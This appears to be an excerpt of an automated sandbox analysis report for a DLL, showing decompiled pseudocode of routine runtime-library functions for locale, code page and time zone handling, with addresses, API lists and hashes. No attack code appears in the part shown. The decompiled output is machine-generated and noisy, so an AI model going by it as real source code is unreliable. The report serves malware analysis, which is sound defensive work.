                          0x00000000
                          0x6e25e771
                          0x6e25e771
                          0x6e25e775
                          0x6e25e787
                          0x6e25e78b
                          0x6e25e77c
                          0x6e25e77c
                          0x6e25e780
                          0x6e25e780
                          0x6e25e794
                          0x6e25e795
                          0x6e25e81f
                          0x6e25e81f
                          0x00000000
                          0x6e25e79b
                          0x6e25e79b
                          0x6e25e7aa
                          0x6e25e7af
                          0x6e25e7b4
                          0x6e25e804
                          0x6e25e804
                          0x6e25e804
                          0x6e25e806
                          0x6e25e80a
                          0x6e25e821
                          0x6e25e82d
                          0x6e25e837
                          0x6e25e83a
                          0x6e25e83b
                          0x6e25e83d
                          0x00000000
                          0x00000000
                          0x6e25e83f
                          0x6e25e845
                          0x00000000
                          0x00000000
                          0x6e25e847
                          0x6e25e84d
                          0x00000000
                          0x00000000
                          0x6e25e853
                          0x6e25e859
                          0x6e25e85b
                          0x00000000
                          0x00000000
                          0x6e25e862
                          0x6e25e868
                          0x6e25e86a
                          0x00000000
                          0x00000000
                          0x6e25e86c
                          0x6e25e86f
                          0x6e25e871
                          0x6e25e873
                          0x6e25e873
                          0x6e25e884
                          0x6e25e889
                          0x6e25e88b
                          0x6e25e8eb
                          0x6e25e80e
                          0x6e25e81e
                          0x6e25e81e
                          0x6e25e89a
                          0x6e25e8aa
                          0x6e25e8b0
                          0x6e25e8b2
                          0x00000000
                          0x00000000
                          0x6e25e8c9
                          0x6e25e8cf
                          0x6e25e8d1
                          0x00000000
                          0x00000000
                          0x6e25e8e3
                          0x00000000
                          0x6e25e8e8
                          0x6e25e80c
                          0x00000000
                          0x6e25e80c
                          0x6e25e7b6
                          0x6e25e7b8
                          0x6e25e7bc
                          0x6e25e7d2
                          0x6e25e7c3
                          0x6e25e7c7
                          0x6e25e7c7
                          0x6e25e7d7
                          0x00000000
                          0x6e25e7d7
                          0x6e25e795

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D66B
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E25E7F8
                          • IsValidCodePage.KERNEL32(00000000), ref: 6E25E853
                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E25E862
                          • GetLocaleInfoW.KERNEL32(?,00001001,;$n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E25E8AA
                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E25E8C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID: )'nU$;$n$;$n$;$n$t!'nE
                          • API String ID: 745075371-2121107865
                          • Opcode ID: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction ID: 31848dbe8ed06705351c518260bf3401cceb05052acfd820eda98e982d1971bc
                          • Opcode Fuzzy Hash: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction Fuzzy Hash: 03516D7290021FABEF50DFE5CD48ABE77BAEF05701F044569E920EB250EB709960CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E6E25DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E24D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E25DD27(" )'nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E25D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E25D775();
					} else {
						E6E25D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E25DD27("t!\'nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E25D775();
							} else {
								E6E25D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E25DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e24e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E25D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E242188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e2c506c; // 0x22cbda9b
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E24D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E24D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E25E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E25806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E25E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E21F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E254323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E254323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E267BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E254323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E267BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E265124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}













































                          0x6e25dd96
                          0x6e25dd9b
                          0x6e25dd9c
                          0x6e25dd9d
                          0x6e25dd9f
                          0x6e25dda0
                          0x6e25dda5
                          0x6e25dda8
                          0x6e25ddaa
                          0x6e25ddad
                          0x6e25ddad
                          0x6e25ddb0
                          0x6e25ddb0
                          0x6e25ddb6
                          0x6e25ddb9
                          0x6e25ddbc
                          0x6e25ddbc
                          0x6e25ddbf
                          0x6e25ddc2
                          0x6e25ddc8
                          0x6e25ddca
                          0x6e25ddcf
                          0x6e25ddd9
                          0x6e25ddde
                          0x6e25dde1
                          0x6e25dde1
                          0x6e25dde5
                          0x6e25dde9
                          0x6e25de32
                          0x00000000
                          0x6e25ddeb
                          0x6e25ddf0
                          0x6e25ddf9
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25de00
                          0x6e25de04
                          0x6e25de0e
                          0x6e25de13
                          0x6e25de18
                          0x6e25de1e
                          0x6e25de22
                          0x6e25de2b
                          0x6e25de24
                          0x6e25de24
                          0x6e25de24
                          0x6e25de37
                          0x6e25de37
                          0x6e25de37
                          0x6e25de18
                          0x6e25de04
                          0x6e25de3d
                          0x6e25df4f
                          0x6e25df4f
                          0x6e25df4f
                          0x00000000
                          0x6e25de43
                          0x6e25de50
                          0x6e25de56
                          0x00000000
                          0x6e25de86
                          0x6e25de86
                          0x6e25de8b
                          0x6e25de8d
                          0x6e25de8d
                          0x6e25de8f
                          0x6e25de8f
                          0x6e25de94
                          0x6e25df4a
                          0x6e25df4c
                          0x00000000
                          0x6e25de9a
                          0x6e25de9a
                          0x6e25de9d
                          0x6e25dea5
                          0x6e25dea8
                          0x6e25deab
                          0x6e25deab
                          0x6e25deae
                          0x6e25deb1
                          0x6e25deb9
                          0x6e25debe
                          0x6e25dec5
                          0x6e25deca
                          0x6e25decd
                          0x6e25decf
                          0x6e25df5a
                          0x6e25df5b
                          0x6e25df5c
                          0x6e25df5d
                          0x6e25df5e
                          0x6e25df5f
                          0x6e25df64
                          0x6e25df68
                          0x6e25df70
                          0x6e25df77
                          0x6e25df7a
                          0x6e25df7b
                          0x6e25df7f
                          0x6e25df85
                          0x6e25df8d
                          0x6e25df9c
                          0x6e25dfa8
                          0x6e25dfb9
                          0x6e25dfbf
                          0x6e25dfc1
                          0x6e25dfd2
                          0x6e25dfd9
                          0x6e25dfdb
                          0x6e25dfde
                          0x6e25dfe4
                          0x6e25dfe6
                          0x6e25dfe8
                          0x6e25dfe8
                          0x6e25dfeb
                          0x6e25dfee
                          0x6e25dfee
                          0x6e25dfe6
                          0x6e25dff8
                          0x6e25dfc3
                          0x6e25dfc3
                          0x6e25dfc5
                          0x6e25dfff
                          0x6e25e000
                          0x6e25e00b
                          0x6e25ded5
                          0x6e25dede
                          0x6e25dee3
                          0x6e25dee5
                          0x00000000
                          0x6e25dee7
                          0x6e25dee9
                          0x6e25df03
                          0x00000000
                          0x6e25df05
                          0x6e25df05
                          0x6e25df08
                          0x6e25df0e
                          0x6e25df11
                          0x6e25df21
                          0x6e25df34
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df13
                          0x6e25df13
                          0x6e25df16
                          0x6e25df1c
                          0x6e25df1d
                          0x6e25df1f
                          0x6e25df36
                          0x6e25df42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df1f
                          0x6e25df11
                          0x6e25df03
                          0x6e25df51
                          0x6e25df57
                          0x6e25df57
                          0x6e25decf
                          0x6e25de94
                          0x6e25de56

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,D1FE2DEA), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E24E042,?,?,?,?,6E24DA1E,?,00000004), ref: 6E25DE78
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF08
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF16
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                          • String ID: )'nU$B$n$t!'nE
                          • API String ID: 4212172061-2691769108
                          • Opcode ID: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction ID: 2b251e721f309d78bfe7e04eb351676c9dd4c35e7766c24981b4a7f2a843bb41
                          • Opcode Fuzzy Hash: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction Fuzzy Hash: 9D61077651420FABE7149BB5CD45BAB73AEEF05705F10086AE919DB380EB30E5618B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E258951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E258951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E25822B();
				_t1 =  &_v8; // 0x6e272130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E258289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e2c506c; // 0x22cbda9b
					_v56 = _t38 ^ _t106;
					 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
					 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e2c7a10 = 0;
					_t42 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e272130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E24F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e272130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E24CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E24CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E258951(0x6e272130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E25877C(0x6e272130, _t90, __eflags);
						}
					}
					E6E24CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E21F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E258231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E25825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E24CBD3( *0x6e2c7a08);
							 *0x6e2c7a08 = 0;
							 *_t107 = 0x6e2c7a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e2c7a18 * 0x3c;
								_t88 =  *0x6e2c7a6c; // 0x0
								_push(__edi);
								 *0x6e2c7a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e2c7a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e2c7ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e2c7ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E243CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E258225()) = _v8;
							 *(E6E258219()) = _v12;
							_t61 = E6E25821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}




































                          0x6e258951
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a3b
                          0x6e258a4b
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a69
                          0x6e258a7b
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b

                          APIs
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E2589A9
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 1286116820-1210743812
                          • Opcode ID: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction ID: d25bdfec5466c19293491472b3e610894336dc36d7c6d903214690091bb99764
                          • Opcode Fuzzy Hash: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
                          • Instruction Fuzzy Hash: 1A51D77181061EEFDB48DFF9CD449AAB7BFAB41710B100A7AE411E7390D7B09A50CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E6E25E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e25e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e25e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                          0x6e25e51d
                          0x6e25e51e
                          0x6e25e525
                          0x6e25e5c9
                          0x6e25e5cf
                          0x6e25e5e2
                          0x6e25e5e8
                          0x6e25e5ed
                          0x6e25e5ef
                          0x6e25e5ef
                          0x6e25e5f5
                          0x6e25e5fa
                          0x6e25e5fa
                          0x6e25e5e4
                          0x6e25e5e4
                          0x00000000
                          0x6e25e5e4
                          0x6e25e52b
                          0x6e25e530
                          0x00000000
                          0x00000000
                          0x6e25e536
                          0x6e25e53b
                          0x6e25e53d
                          0x6e25e53d
                          0x6e25e543
                          0x00000000
                          0x00000000
                          0x6e25e548
                          0x6e25e55f
                          0x6e25e55f
                          0x6e25e568
                          0x6e25e56a
                          0x00000000
                          0x00000000
                          0x6e25e56c
                          0x6e25e571
                          0x6e25e573
                          0x6e25e573
                          0x6e25e579
                          0x00000000
                          0x00000000
                          0x6e25e57e
                          0x6e25e59c
                          0x6e25e59e
                          0x6e25e5c1
                          0x00000000
                          0x6e25e5c6
                          0x6e25e5a6
                          0x6e25e5b9
                          0x00000000
                          0x00000000
                          0x6e25e5bb
                          0x00000000
                          0x6e25e5bb
                          0x6e25e580
                          0x6e25e588
                          0x00000000
                          0x00000000
                          0x6e25e58a
                          0x6e25e58d
                          0x6e25e593
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e595
                          0x6e25e597
                          0x6e25e599
                          0x00000000
                          0x6e25e599
                          0x6e25e54a
                          0x6e25e552
                          0x00000000
                          0x00000000
                          0x6e25e554
                          0x6e25e557
                          0x6e25e55d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e55d
                          0x6e25e563
                          0x6e25e565
                          0x00000000

                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5B1
                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5DA
                          • GetACP.KERNEL32(?,?,6E25E837,?,00000000), ref: 6E25E5EF
                          Strings
                          Memory Dump Source
